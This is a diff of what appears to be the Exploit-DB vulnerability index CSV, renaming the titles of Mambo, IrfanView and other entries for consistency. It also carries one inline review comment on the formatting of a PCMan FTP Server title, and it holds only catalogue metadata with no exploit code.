 5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0
 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0
@@ -5562,7 +5562,7 @@ id,file,description,date,author,platform,type,port
 5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
 5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0
 5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0
-5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - (artid) Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0
+5935,platforms/php/webapps/5935.pl,"Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0
 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0
 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
 5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0
@@ -5604,7 +5604,7 @@ id,file,description,date,author,platform,type,port
 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) SQL Injection",2008-06-30,DNX,php,webapps,0
 5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - (vga) Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
-5980,platforms/php/webapps/5980.txt,"Mambo Component n-gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
+5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
 5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
@@ -5808,7 +5808,7 @@ id,file,description,date,author,platform,type,port
 6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
 6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
 6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
-6188,platforms/windows/local/6188.c,"Irfanview 3.99 - IFF File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0
+6188,platforms/windows/local/6188.c,"IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0
 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0
 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0
 6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0
@@ -6631,7 +6631,7 @@ id,file,description,date,author,platform,type,port
 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0
 7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
-7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - (form_id) Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
+7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0
 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0
@@ -7402,7 +7402,7 @@ id,file,description,date,author,platform,type,port
 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos,0
 7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,hardware,remote,0
 7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - (avatar) Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
-7860,platforms/php/webapps/7860.php,"Mambo com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
+7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0
 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0
@@ -9077,7 +9077,7 @@ id,file,description,date,author,platform,type,port
 9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0
 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0
 9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow",2009-09-09,"Jeremy Brown",linux,local,0
-9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0
+9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0
 9610,platforms/windows/local/9610.py,"Audio Lib Player - '.m3u' Buffer Overflow (SEH)",2009-09-09,blake,windows,local,0
 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0
@@ -9178,7 +9178,7 @@ id,file,description,date,author,platform,type,port
 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0
 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0
-9714,platforms/multiple/webapps/9714.txt,"Mambo com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0
+9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0
 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0
 9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - header.php Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0
 9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0
@@ -9228,7 +9228,7 @@ id,file,description,date,author,platform,type,port
 9829,platforms/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80
 9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
 9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0
-9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
+9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component 'com_tupinambis' - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
 9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0
 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
 9835,platforms/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps,0
@@ -9495,7 +9495,7 @@ id,file,description,date,author,platform,type,port
 10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 - found Denial of Service",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80
 10176,platforms/windows/dos/10176.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code",2009-11-17,"Core Security",windows,dos,0
 10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0
-10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component com_ezine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0
+10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0
 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0
 10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
 10182,platforms/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos,0
@@ -9973,7 +9973,7 @@ id,file,description,date,author,platform,type,port
 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow",2009-12-27,mr_me,windows,local,0
 10747,platforms/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Exploit",2009-12-27,dijital1,windows,local,0
 10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0
-10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0
+10750,platforms/php/webapps/10750.txt,"Mambo Component 'com_materialsuche' 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0
 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0
 10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80
 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80
@@ -10488,7 +10488,7 @@ id,file,description,date,author,platform,type,port
 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0
 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
-11446,platforms/php/webapps/11446.txt,"Mambo com_akogallery - SQL Injection",2010-02-14,snakespc,php,webapps,0
+11446,platforms/php/webapps/11446.txt,"Mambo Component 'com_akogallery' - SQL Injection",2010-02-14,snakespc,php,webapps,0
 11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0
 11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0
 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0
@@ -10512,7 +10512,7 @@ id,file,description,date,author,platform,type,port
 11470,platforms/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0
 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0
 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0
-11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0
+11474,platforms/php/webapps/11474.txt,"Mambo Component 'com_acnews' - 'id' Parameter SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0
 11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,windows,local,0
 11476,platforms/php/webapps/11476.txt,"SongForever.com Clone - Arbitrary File Upload",2010-02-16,indoushka,php,webapps,0
 11477,platforms/php/webapps/11477.txt,"Limny 2.0 - Cross-Site Request Forgery (Change Email and Password)",2010-02-16,"Luis Santana",php,webapps,0
@@ -10720,7 +10720,7 @@ id,file,description,date,author,platform,type,port
 11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black - 'index.php' SQL Injection",2010-03-13,"Easy Laster",php,webapps,0
 11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0
 11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,php,webapps,0
-11719,platforms/php/webapps/11719.txt,"Mambo Component com_mambads - SQL Injection",2010-03-13,Dreadful,php,webapps,0
+11719,platforms/php/webapps/11719.txt,"Mambo Component 'com_mambads' - SQL Injection",2010-03-13,Dreadful,php,webapps,0
 11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0
 11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0
 11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0
@@ -11307,7 +11307,7 @@ id,file,description,date,author,platform,type,port
 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps,0
 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec - Local File Inclusion",2010-04-25,R3VAN_BASTARD,php,webapps,0
 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Stack Buffer Overflow (PoC)",2010-04-25,mr_me,windows,local,0
-12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0
+12380,platforms/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0
 12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - 'FCKeditor' Arbitrary File Upload",2010-04-25,eidelweiss,php,webapps,0
 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0
 12383,platforms/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,php,webapps,0
@@ -13725,7 +13725,7 @@ id,file,description,date,author,platform,type,port
 15792,platforms/hardware/dos/15792.php,"Apple iOS Safari - (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0
 15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,php,webapps,0
 15794,platforms/hardware/dos/15794.php,"Apple iOS Safari - (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0
-15795,platforms/php/webapps/15795.txt,"Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,php,webapps,0
+15795,platforms/php/webapps/15795.txt,"S9Y Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,php,webapps,0
 15796,platforms/hardware/dos/15796.php,"Apple iOS Safari - (decodeURIComponent) Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos,0
 15797,platforms/php/webapps/15797.txt,"Hycus CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
 15798,platforms/php/webapps/15798.txt,"Injader CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
@@ -13771,7 +13771,7 @@ id,file,description,date,author,platform,type,port
 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
 15847,platforms/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps,0
 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0
-15845,platforms/windows/dos/15845.py,"Irfanview 4.27 - 'JP2000.dll' plugin Denial of Service",2010-12-29,BraniX,windows,dos,0
+15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - 'JP2000.dll' plugin Denial of Service",2010-12-29,BraniX,windows,dos,0
 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,php,webapps,0
 15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0
 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos,0
@@ -13837,7 +13837,7 @@ id,file,description,date,author,platform,type,port
 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local,0
 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",php,webapps,0
 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
-15946,platforms/windows/dos/15946.py,"Irfanview 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
+15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
 15958,platforms/php/webapps/15958.txt,"Joomla! Plugin Captcha 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - '.MXE' File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,windows,dos,0
 15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload",2011-01-10,eidelweiss,php,webapps,0
@@ -14931,8 +14931,8 @@ id,file,description,date,author,platform,type,port
 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS - SQL Injection",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0
 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0
 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,php,webapps,0
-17142,platforms/windows/dos/17142.py,"Irfanview 4.28 - ICO With Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0
-17143,platforms/windows/dos/17143.py,"Irfanview 4.28 - ICO Without Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0
+17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0
+17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0
 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - '.zip' Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0
 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection",2011-04-11,R3d-D3V!L,php,webapps,0
 17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,linux,local,0
@@ -15226,7 +15226,7 @@ id,file,description,date,author,platform,type,port
 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure",2011-07-07,@ygoltsev,jsp,webapps,0
 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0
 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,80
-39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - PUT Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21
+39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21
 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0
 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution",2011-07-08,wofeiwo,php,webapps,0
 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0
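Review bot: The new title for 39662 still has the vulnerability class in front of the separator, `PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit)`, while the other PCMan rows touched in this commit (27277, 27703, 28328) read product, then ` - `, then `'<CMD>' Command <class>`. Anything that splits the title on ` - ` to get the product name, or a search for "PCMan FTP Server" followed by a version, will handle this row differently from its siblings. Consider `"PCMan FTP Server - 'PUT' Command Buffer Overflow (Metasploit)"`; the affected version is not visible in this row, so none is suggested here.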
@@ -15351,7 +15351,7 @@ id,file,description,date,author,platform,type,port
 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0
 17660,platforms/php/webapps/17660.txt,"VideoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0
 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0
-17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x - (4.6.5) SQL Injection",2011-08-13,"Aung Khant",php,webapps,0
+17662,platforms/php/webapps/17662.txt,"Mambo 4.6.x < 4.6.5 - SQL Injection",2011-08-13,"Aung Khant",php,webapps,0
 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0
 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos,0
 17667,platforms/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0
@@ -15738,7 +15738,7 @@ id,file,description,date,author,platform,type,port
 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,windows,dos,0
 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,windows,dos,0
 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,windows,local,0
-18110,platforms/php/webapps/18110.txt,"Mambo CMS 4.x - (Zorder) SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0
+18110,platforms/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0
 18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client - Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0
 18120,platforms/linux/dos/18120.py,"FleaHttpd - Remote Denial of Service",2011-11-16,condis,linux,dos,80
 18111,platforms/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0
@@ -15843,9 +15843,9 @@ id,file,description,date,author,platform,type,port
 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0
 18250,platforms/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0
 18251,platforms/php/webapps/18251.txt,"Joomla! Component com_dshop - SQL Injection",2011-12-19,CoBRa_21,php,webapps,0
-18257,platforms/windows/dos/18257.txt,"Irfanview - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
+18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
-18256,platforms/windows/dos/18256.txt,"Irfanview FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
+18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
 18258,platforms/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0
 18259,platforms/php/webapps/18259.txt,"Infoproject Business Hero - Multiple Vulnerabilities",2011-12-21,LiquidWorm,php,webapps,0
 18260,platforms/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,jsp,webapps,0
@@ -16230,7 +16230,7 @@ id,file,description,date,author,platform,type,port
 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0
 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0
 18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0
-18739,platforms/windows/dos/18739.txt,"Irfanview FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
+18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
 18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
 18741,platforms/php/webapps/18741.txt,"Joomla! Component com_ponygallery - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0
 18742,platforms/php/webapps/18742.php,"NetworX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-15,N3t.Crack3r,php,webapps,0
@@ -16342,7 +16342,7 @@ id,file,description,date,author,platform,type,port
 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0
